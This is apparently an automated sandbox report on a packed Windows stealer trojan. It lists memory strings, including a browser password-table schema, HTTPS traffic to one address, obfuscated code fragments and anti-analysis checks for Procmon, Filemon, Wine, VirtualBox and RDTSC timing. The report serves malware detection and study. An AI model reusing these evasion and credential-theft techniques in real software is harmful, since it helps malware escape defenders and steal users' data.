Source: file.exe, 00000000.00000003.1607183796.0000000005729000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: file.exe, 00000000.00000003.1545155969.0000000005738000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: file.exe, 00000000.00000003.1545155969.0000000005738000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: file.exe, 00000000.00000003.1606857160.0000000005A46000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: file.exe, 00000000.00000003.1606857160.0000000005A46000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000003.1606857160.0000000005A46000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000003.1606857160.0000000005A46000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.1606857160.0000000005A46000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000003.1606857160.0000000005A46000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49713 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49714 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49715 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49716 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49717 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49718 version: TLS 1.2

            System Summary

            Source: file.exe | Static PE information: section name: (non-printable)
            Source: file.exe | Static PE information: section name: .idata
            Source: file.exe | Static PE information: section name: (non-printable)
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB4A7E0_2_00BB4A7E
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B72A710_2_00B72A71
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B46A730_2_00B46A73
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C18A170_2_00C18A17
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C76A250_2_00C76A25
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B4EA4C0_2_00B4EA4C
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB8A440_2_00BB8A44
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C0CBE50_2_00C0CBE5
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C2EBF60_2_00C2EBF6
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C52B8E0_2_00C52B8E
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B54BF90_2_00B54BF9
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C58B970_2_00C58B97
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BA2BE9
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C7ABA5
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C1EBA4
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BDABDA
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B3EBDC
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ADCBD0
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C64B44
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C3EB45
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD8B20
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B48B3A
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C22B4C
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C24B52
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C6CB57
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C5CB57
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C14B5D
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C34B5C
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B8EB10
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BA2B16
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BA0B04
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C5AB08
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B14B60
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C72B13
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BAEB67
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B5EB56
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BDEB53
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD2B50
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C2ACC2
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B52C9B
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B1CC80
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B8CC8E
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BB4CEB
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C10C99
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BF0CD1
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BCACCD
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BC6CC4
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B7CCCB
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C6EC4F
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B44C3E
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B90C35
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B6EC39
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C20C52
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C5EC57
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BCEC2B
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C06C5B
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C84C57
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C02C61
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B9AC15
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B6AC01
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C60C7E
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C6AC7D
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B70C61
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B74C56
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B42C5C
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B5AC5D
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BF2C57
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B62C5A
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AEB1D8
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BEEDB8
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C40DC9
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CA4DDC
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C1ADD9
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C72DEF
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C0CDF3
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B48D89
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C22D86
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C5AD80
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BBCDF1
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C7ED90
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BE8D3A
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C62D42
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BF4D3A
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFCD20
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B7ED17
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C46D65
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C76D61
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BAAD13
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B5CD00
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B60D03
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BD4D03
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B86D6C
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C42D10
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BA6D58
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BEAD5A
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AECD45
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C80D3C
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C70EC6
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFCEB6
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C00EC9
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B56EA3
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C7AEE4
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BB0E94
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B66E85
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BDEE89
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C74EFD
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BC2E80
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BC4E81
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AEEEFE
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C26E9A
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C50EAA
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B6CEC5
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BDCEC3
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B8AE3B
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BE0E3A
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B7AE3C
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C04E52
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B7CE08
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BE4E01
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C3AE05
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BD8E74
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C0EE18
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C84E2A
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B78E43
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C56E3D
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B98E44
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B4EE4A
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C54E3B
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B3EFB9
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B52FB8
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BE0FA7
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C7AFDC
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B6AFA9
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B94F99
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C82FEC
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BAEF96
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C20FEE
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C52FFC
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B7AF8D
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AE6F90
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B12FF0
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C68F88
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BCEFED
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B3EFE1
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B9EFEF
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C14F9A
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BA8FE6
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C2EF9D
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C0CFB0
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C46FB9
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C6EFB9
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BB8F3E
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C5CF54
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C58F51
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B42F2A
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C24F61
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BF6F19
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C30F6D
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B74F76
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BE6F71
            Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00AEA420 appears 105 times
            Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00ADB380 appears 44 times
            Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: file.exe | Static PE information: Section: grpnkoxr ZLIB complexity 0.9948958253670848
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B08AC0 CoCreateInstance,
            Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: file.exe, 00000000.00000003.1573383134.0000000005739000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1544513244.0000000005825000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1544872151.000000000574D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1573255220.000000000575A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: file.exe | ReversingLabs: Detection: 60%
            Source: file.exe | Virustotal: Detection: 56%
            Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
            Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
            Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: webio.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: schannel.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: mskeyprotect.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: ncryptsslp.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: dpapi.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: wbemcomn.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
            Source: file.exe | Static file information: File size 2078208 > 1048576
            Source: file.exe | Static PE information: Raw size of grpnkoxr is bigger than: 0x100000 < 0x198a00

            Data Obfuscation

            Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.ad0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;grpnkoxr:EW;gkiotden:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;grpnkoxr:EW;gkiotden:EW;.taggant:EW;
            Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
            Source: file.exe | Static PE information: real checksum: 0x20b4e9 should be: 0x2078d7
            Source: file.exe | Static PE information: section name:
            Source: file.exe | Static PE information: section name: .idata
            Source: file.exe | Static PE information: section name:
            Source: file.exe | Static PE information: section name: grpnkoxr
            Source: file.exe | Static PE information: section name: gkiotden
            Source: file.exe | Static PE information: section name: .taggant
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B3655D push 48C7DD26h; mov dword ptr [esp], edx | 0_2_00B37325
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B3655D push 13D33407h; mov dword ptr [esp], eax | 0_2_00B3736B
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B340B3 push edi; mov dword ptr [esp], edx | 0_2_00B34008
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B340B2 push edi; mov dword ptr [esp], edx | 0_2_00B34008
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B360AF push 341F845Fh; mov dword ptr [esp], esi | 0_2_00B36134
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B360AF push ecx; mov dword ptr [esp], 12FB3782h | 0_2_00B36138
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B860A6 push ebx; mov dword ptr [esp], eax | 0_2_00B86622
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B860A6 push 13D34F40h; mov dword ptr [esp], ecx | 0_2_00B86706
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B860A6 push eax; mov dword ptr [esp], ebx | 0_2_00B86794
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B860A6 push ebx; mov dword ptr [esp], esp | 0_2_00B86837
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B860A6 push ebx; mov dword ptr [esp], 7C4637C7h | 0_2_00B868C4
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BA00A5 push 521B4710h; mov dword ptr [esp], ecx | 0_2_00BA00D3
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BA00A5 push edx; mov dword ptr [esp], eax | 0_2_00BA0131
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BA00A5 push eax; mov dword ptr [esp], 40CDF417h | 0_2_00BA01EA
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BA00A5 push edx; mov dword ptr [esp], ecx | 0_2_00BA01FA
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B3609E push 341F845Fh; mov dword ptr [esp], esi | 0_2_00B36134
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B3609E push ecx; mov dword ptr [esp], 12FB3782h | 0_2_00B36138
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B340E0 push ebp; mov dword ptr [esp], edx | 0_2_00B34278
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B380DD push 654530A7h; mov dword ptr [esp], eax | 0_2_00B39D01
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B380DD push edx; mov dword ptr [esp], eax | 0_2_00B39D05
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B380C0 push edi; mov dword ptr [esp], ebx | 0_2_00B381F7
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B3A02C push eax; mov dword ptr [esp], ecx | 0_2_00B3A038
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B38010 push 1C24FBBDh; mov dword ptr [esp], ecx | 0_2_00B3C130
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B36019 push 341F845Fh; mov dword ptr [esp], esi | 0_2_00B36134
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B36019 push ecx; mov dword ptr [esp], 12FB3782h | 0_2_00B36138
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B3407D push edi; mov dword ptr [esp], 1EE01231h | 0_2_00B34093
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B3606C push 341F845Fh; mov dword ptr [esp], esi | 0_2_00B36134
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B3606C push ecx; mov dword ptr [esp], 12FB3782h | 0_2_00B36138
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B38050 push 6FCE2051h; mov dword ptr [esp], esi | 0_2_00B38062
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B36040 push 341F845Fh; mov dword ptr [esp], esi | 0_2_00B36134
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B36040 push ecx; mov dword ptr [esp], 12FB3782h | 0_2_00B36138
            Source: file.exe | Static PE information: section name: entropy: 7.147151884597137
            Source: file.exe | Static PE information: section name: grpnkoxr entropy: 7.954246998260437

            Boot Survival

            Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
            Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
            Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
            Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
            Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
            Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
            Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Filemonclass
            Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
            Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
            Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\file.exe | System information queried: FirmwareTableInformation
            Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
            Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CB15A2 second address: CB15D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B4D4AC9EBh 0x00000009 pop ebx 0x0000000a jmp 00007F2B4D4AC9F1h 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 jnc 00007F2B4D4AC9E6h 0x00000019 pop ebx 0x0000001a push ecx 0x0000001b push edx 0x0000001c pop edx 0x0000001d jc 00007F2B4D4AC9E6h 0x00000023 pop ecx 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CB09D4 second address: CB0A22 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2B4CC6E2A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F2B4CC6E2B3h 0x0000000f jmp 00007F2B4CC6E2B7h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F2B4CC6E2B8h 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CB0A22 second address: CB0A3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4D4AC9F5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CB0E68 second address: CB0EB0 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2B4CC6E2BBh 0x00000008 jmp 00007F2B4CC6E2AFh 0x0000000d jnp 00007F2B4CC6E2A6h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 jmp 00007F2B4CC6E2B2h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F2B4CC6E2B4h 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CB0EB0 second address: CB0EB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CB3C18 second address: CB3C72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B4CC6E2B3h 0x00000009 popad 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007F2B4CC6E2B3h 0x00000014 mov eax, dword ptr [eax] 0x00000016 pushad 0x00000017 push edx 0x00000018 push edi 0x00000019 pop edi 0x0000001a pop edx 0x0000001b pushad 0x0000001c jmp 00007F2B4CC6E2B5h 0x00000021 push ebx 0x00000022 pop ebx 0x00000023 popad 0x00000024 popad 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 push esi 0x0000002a push eax 0x0000002b push edx 0x0000002c push edx 0x0000002d pop edx 0x0000002e rdtsc
